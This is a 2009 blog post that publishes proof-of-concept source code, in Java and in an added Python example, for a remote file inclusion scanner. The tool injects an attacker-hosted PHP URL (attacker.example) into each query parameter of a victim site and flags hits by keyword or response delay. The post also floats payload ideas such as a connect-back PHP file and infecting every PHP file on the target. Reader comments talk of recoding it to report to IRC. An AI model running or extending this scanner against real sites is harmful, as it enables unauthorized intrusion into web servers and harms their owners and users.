[POC] RFI Scanner

Posted: January 5, 2009 in kd-team archive, tools

Well, it certainly is true: why not? That question never has a correct answer, imo. It is the same question I asked myself yesterday. I was thinking about what to write on my blog (I was bored and thought that blog writing could help); after a while I just gave up (so, lesson learned: only write when you actually have something to write about). So today I fired up my browser (for those wondering, this is a personal opinion: I use Opera {FTW!}, IE {nice} and FF {sucks}, depending on what I need) and the first thing I saw was this. Which is funny, since it was only a couple of days ago that I posted about Python, and now I see a nice and small Python script to do funky stuff.

I hadn't even finished reading when I followed the first link I encountered, which is this one. It's a very nice write-up on how to own IIS 5 using "mythical" exploits. This brought me back to my question from the day before: why not? Since I didn't have an answer, here is my never-finished source code to scan for RFI (remote file inclusion). The whole reason I started coding this scanner was that I'm lazy and I thought: why do it myself if I can automate it? If you want an overview of what you should and shouldn't automate on a pentest, read this write-up.

Basically my todo list when I first wanted to code the scanner was as follows:

  • implement looping through all query parameters of the target URL
  • implement setting each parameter to the evil URL that hosts the evil PHP
  • check the response for a specified keyword (the output of the evil PHP)

Then, while I was working on it, I had some better ideas for detecting RFI which I never got around to implementing:

  • create a PHP file that copies an image and renames it to evil.extension, then check whether that file exists; this is more reliable than just checking whether the page returns a certain keyword (renaming .php to .txt would be stupid, it would open the door for every single person out there)
  • create a PHP file that connects back, so the scanner only has to know whether there has been a connect-back from the IP it is scanning (only works if outbound connections are allowed)
  • create a PHP file with a time delay; the scanner would then request the URL twice, with and without the evil PHP, and measure the time difference
  • infect all PHP files with a header that outputs "hi", then call the URL again to clean all PHP files
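
The design in the two lists above, as an added example in Python (the language the post considers for a rewrite) and not code from the original post: it loops over the query parameters, swaps each value for an attacker URL, and applies both the original keyword check and the time-delay check from the second list. The attacker URLs, the marker string and the fake target standing in for a vulnerable include($_GET['page']) page are constructed for the example; http_fetch is what you would pass instead of the fake target against a real, authorized target.

```python
"""RFI scanner core: loop params, inject an attacker URL, detect by keyword or
by timing. Added example, not the original post's code. The attacker URLs, the
marker and the fake target below are assumptions made for the example."""
import time
import urllib.request
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Hypothetical attacker-hosted payloads (assumptions, not from the post).
ATTACK_URL = "http://attacker.example/evil.txt"   # echoes SEARCH_WORD when included
SLEEP_URL = "http://attacker.example/sleep.txt"   # calls sleep(5) when included
SEARCH_WORD = "RFI_MARKER_7f3a9c"


def build_attack_urls(victim_url, attack_url):
    """One candidate URL per query parameter, with that parameter's value swapped
    for attack_url. Mutating the parsed pair list (instead of str.replace on the
    raw URL) cannot accidentally rewrite an unrelated parameter whose text is a
    substring of this one, e.g. 'id=1' inside 'pid=1'."""
    parts = urlsplit(victim_url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    candidates = []
    for i, (name, _old) in enumerate(pairs):
        mutated = list(pairs)
        mutated[i] = (name, attack_url)
        candidates.append((name, urlunsplit(parts._replace(query=urlencode(mutated)))))
    return candidates


def http_fetch(url, timeout=10):
    """Real fetcher for authorized targets: returns (body, seconds). A 4xx/5xx or
    a timeout on one URL counts as an empty body instead of aborting the scan."""
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except Exception:
        body = ""
    return body, time.perf_counter() - start


def scan_keyword(victim_url, fetch, attack_url=ATTACK_URL, search_word=SEARCH_WORD):
    """Original design: a parameter is flagged when the response contains the
    marker printed by the remote payload. Returns the flagged parameter names."""
    return [name for name, url in build_attack_urls(victim_url, attack_url)
            if search_word in fetch(url)[0]]


def scan_timing(victim_url, fetch, sleep_url=SLEEP_URL, delay=5.0, tolerance=0.5):
    """Time-delay idea: request the page as-is, then with the sleeping payload in
    each parameter, and flag the parameter when the difference is about `delay`.
    Works even when the included file's output never reaches the response."""
    _body, baseline = fetch(victim_url)
    flagged = []
    for name, url in build_attack_urls(victim_url, sleep_url):
        _body, elapsed = fetch(url)
        if elapsed - baseline >= delay - tolerance:
            flagged.append(name)
    return flagged


def make_fake_target(vulnerable_param):
    """Constructed stand-in for a site doing include($_GET[vulnerable_param]).
    Returns a fetch(url) -> (body, seconds) callable; no network is used and the
    sleep is simulated so the example runs offline."""
    def fetch(url):
        params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
        body, seconds = "<html>static content</html>", 0.05
        value = params.get(vulnerable_param)
        if value == ATTACK_URL:
            body += SEARCH_WORD      # the included remote file echoed the marker
        elif value == SLEEP_URL:
            seconds += 5.0           # the included remote file called sleep(5)
        return body, seconds
    return fetch


if __name__ == "__main__":
    target = make_fake_target("page")
    victim = "http://victim.example/index.php?page=main&id=1"
    print("keyword:", scan_keyword(victim, target))   # ['page']
    print("timing: ", scan_timing(victim, target))    # ['page']
```

The two checks are kept separate on purpose: the keyword check is cheap and needs only one request per parameter, while the timing check costs a baseline request plus a slow request per parameter but still fires when the vulnerable script includes the file without echoing anything back. Against a real target, replace the fake target with http_fetch and host the two payload files yourself.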

So who knows, maybe one day I will extend this scanner, or maybe I'll even attempt to rewrite it in Python including the features I never got around to implementing.

RfiScanner.java

/*
 * RfiScanner.java
 *
 * Created on 9 november 2007, 19:39
 *
 * @author DiabloHorn
 */

package rrfiscanner;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;

/**
 * Requests every attack URL produced by PrepareURL and reports the ones whose
 * response contains the search word (the output of the included evil PHP).
 *
 * @author DiabloHorn
 */
public class RfiScanner {
    private Proxy _conProxy;
    private boolean _useProxy;
    private String _SEARCH_WORD;
    private String _vUrl, _aUrl;

    /**
     * @param vUrl The victim URL including its query string
     * @param aUrl The attacker URL hosting the evil PHP
     */
    public RfiScanner(String vUrl, String aUrl) {
        this._vUrl = vUrl;
        this._aUrl = aUrl;
    }

    public void setUseProxy(boolean use) {
        this._useProxy = use;
    }

    public void setProxy(Proxy proxy) {
        this._conProxy = proxy;
    }

    public void setSearchWord(String word) {
        this._SEARCH_WORD = word;
    }

    public void scan() {
        if (_SEARCH_WORD == null) {
            // indexOf(null) below would throw a NullPointerException
            System.err.println("No search word set, nothing to look for in the responses");
            return;
        }
        try {
            PrepareURL victimURL = new PrepareURL(_vUrl, _aUrl);
            URLConnection uc = null;
            while (victimURL.hasNext()) {
                URL u = victimURL.next();

                if (_useProxy) {
                    uc = u.openConnection(_conProxy);
                } else {
                    uc = u.openConnection();
                }
                System.out.println("SCANNING: " + u.toString());
                BufferedReader r = null;
                try {
                    r = new BufferedReader(new InputStreamReader(uc.getInputStream()));
                    String c;
                    while ((c = r.readLine()) != null) {
                        if (c.indexOf(_SEARCH_WORD) != -1) {
                            System.out.println("VULNERABLE URL: " + u.toString());
                            break; // stop searching, one hit is enough
                        }
                    }
                } catch (IOException ioe) {
                    // a 4xx/5xx or a timeout on one URL should not abort the whole scan
                    System.err.println("FAILED: " + u.toString() + " (" + ioe.getMessage() + ")");
                } finally {
                    if (r != null) {
                        try { r.close(); } catch (IOException ignored) { }
                    }
                }
            }
        } catch (MalformedURLException mfue) {
            System.err.println(mfue.toString());
        } catch (Exception e) {
            System.err.println(e.toString());
        }
    }
}

PrepareURL.java

/*
 * PrepareURL.java
 * @author DiabloHorn
 */

package rrfiscanner;

import java.net.MalformedURLException;
import java.net.URL;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Set;

/**
 * Builds one attack URL per query parameter of the victim URL, each with that
 * parameter's value replaced by the attacker-controlled URL.
 *
 * @author DiabloHorn
 */
public class PrepareURL {
    private static final int _nextItemInitialize = -1;
    private String _victimURL;
    private String _evilUrl;
    private ArrayList<URL> _attackUrlList;
    private int _nextItem;

    /**
     * @param victimUrl The URL of the site whose params you want to inject stuff into
     * @param attackUrl The "stuff"
     * @throws MalformedURLException Wrong URL
     */
    public PrepareURL(String victimUrl, String attackUrl) throws MalformedURLException {
        this._victimURL = victimUrl;
        this._evilUrl = attackUrl;
        _nextItem = _nextItemInitialize;
        fillList();
    }

    /**
     * @return True if there is another element left, false otherwise
     */
    public boolean hasNext() {
        return _nextItem < (_attackUrlList.size() - 1);
    }

    /**
     * @return The next attack URL
     */
    public URL next() {
        _nextItem++;
        return _attackUrlList.get(_nextItem);
    }

    /**
     * Resets the iterator so you can loop through the URLs again
     */
    public void reset() {
        _nextItem = _nextItemInitialize;
    }

    private void fillList() throws MalformedURLException {
        _attackUrlList = new ArrayList<URL>();
        int qmark = _victimURL.indexOf("?");
        if (qmark == -1) {
            return; // no query string, so there is nothing to inject into
        }
        String query = _victimURL.substring(qmark + 1);
        HashMap<String, String> paramPairs = getParameters(query);
        Set<String> paramNames = paramPairs.keySet();
        Iterator<String> iParamNames = paramNames.iterator();
        String str;
        while (iParamNames.hasNext()) {
            str = iParamNames.next();
            // A plain replace can also hit another parameter whose text is a
            // substring of this one (e.g. id=1 inside pid=1); good enough for a POC.
            _attackUrlList.add(new URL(_victimURL.replace(str + "=" + paramPairs.get(str), str + "=" + _evilUrl)));
        }
    }

    /**
     * @param query The query string to be split into parameters and their values
     * @return A HashMap with paramname:paramvalue
     */
    private HashMap<String, String> getParameters(String query) {
        HashMap<String, String> paramPairs = new HashMap<String, String>();

        String[] rawPairs = query.split("&");
        // Loop body was cut off on the original page; reconstructed from the Javadoc contract above.
        for (int i = 0; i < rawPairs.length; i++) {
            int eq = rawPairs[i].indexOf("=");
            if (eq == -1) {
                paramPairs.put(rawPairs[i], ""); // parameter without a value
            } else {
                paramPairs.put(rawPairs[i].substring(0, eq), rawPairs[i].substring(eq + 1));
            }
        }
        return paramPairs;
    }
}

Comments
  1. n4pst3r says:

    how to compile!

  2. AkhlD says:

    thanks friend... I was looking for a Java scanner ;) I'll recode it and redirect the o/p to IRC via the PircBot framework ;)

  3. XyLeM says:

    Would you like to make an affiliation with my forum?

    The link is: htpp://attackersc.altervista.org/ or http://attackersc.altervista.org/forums
